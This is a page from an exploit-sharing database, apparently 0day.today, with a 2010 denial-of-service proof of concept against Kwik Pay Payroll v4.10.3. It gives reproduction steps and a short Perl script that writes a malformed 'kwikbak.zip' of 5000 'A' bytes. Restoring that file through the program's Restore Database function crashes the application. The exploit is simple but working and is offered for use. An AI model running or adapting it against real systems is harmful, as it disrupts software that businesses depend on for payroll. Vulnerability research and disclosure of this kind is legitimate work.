[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Kwik Pay Payroll v4.10.3 .zip DoS

Author
chap0
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11572
Category
dos / poc
Date add
01-04-2010
Platform
windows
=================================
Kwik Pay Payroll v4.10.3 .zip DoS
=================================

# Tested on: Windows XP SP3
# Cost: 100.00 AU
# Author: chap0
# Email: chap0x90[at]gmail[dot]com
# Site: [http://www.setfreesecurity.com]
#
# File -> Restore Database -> Find
# Locate zip file
# Click the restore button at the bottom
# Program Crash, and becomes unresponsive
#
# Happy April fools but no Joke here
#
# Phil 4:13
#
#!/usr/bin/perl
 
 
print "Generating nasty Backup\n";
 
my $data = "\x41" x 5000;
my $zip = "kwikbak.zip";
 
open (FILE, ">$zip");
print FILE "$data";
 
print "Done. . .\n"



#  0day.today [2024-12-24]  #